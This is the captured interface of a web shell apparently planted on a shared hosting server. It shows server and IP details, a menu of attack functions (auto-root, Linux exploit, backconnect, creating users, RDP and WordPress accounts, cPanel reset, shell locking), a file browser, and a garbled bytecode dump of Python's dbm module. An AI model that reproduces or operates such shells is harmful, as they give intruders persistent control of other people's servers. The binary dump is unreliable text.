Linux business72.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
LiteSpeed
: 162.0.229.97 | : 3.14.253.202
Cant Read [ /etc/named.conf ]
8.1.30
temmmp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
opt /
alt /
python34 /
lib64 /
python3.4 /
dbm /
__pycache__ /
[ HOME SHELL ]
Name
Size
Permission
Action
__init__.cpython-34.pyc
4.34
KB
-rw-r--r--
__init__.cpython-34.pyo
4.34
KB
-rw-r--r--
dumb.cpython-34.pyc
7.54
KB
-rw-r--r--
dumb.cpython-34.pyo
7.54
KB
-rw-r--r--
gnu.cpython-34.pyc
214
B
-rw-r--r--
gnu.cpython-34.pyo
214
B
-rw-r--r--
ndbm.cpython-34.pyc
213
B
-rw-r--r--
ndbm.cpython-34.pyo
213
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : __init__.cpython-34.pyc
� i f� � @ s d Z d d d g Z d d l Z d d l Z d d l Z d d l Z Gd d � d e � Z d d d g Z d a i Z e e f Z y d d l m Z Wn e k r� d Z Yn Xd d d d � Z d d � Z e d k rx7 e j d d � D] Z e e e � pd e � q� Wn d S)aN Generic interface to all dbm clones. Use import dbm d = dbm.open(file, 'w', 0o666) The returned object is a dbm.gnu, dbm.ndbm or dbm.dumb object, dependent on the type of database being opened (determined by the whichdb function) in the case of an existing dbm. If the dbm does not exist and the create or new flag ('c' or 'n') was specified, the dbm type will be determined by the availability of the modules (tested in the above order). It has the following interface (key and data are strings): d[key] = data # store data at key (may override data at # existing key) data = d[key] # retrieve data at key (raise KeyError if no # such key) del d[key] # delete data stored at key (raises KeyError # if no such key) flag = key in d # true if the key exists list = d.keys() # return a list of all existing keys (slow!) Future versions may change the order in which implementations are tested for existence, and add interfaces to other dbm-like implementations. �open�whichdb�error� Nc @ s e Z d Z d S)r N)�__name__� __module__�__qualname__� r r �1/opt/alt/python34/lib64/python3.4/dbm/__init__.pyr &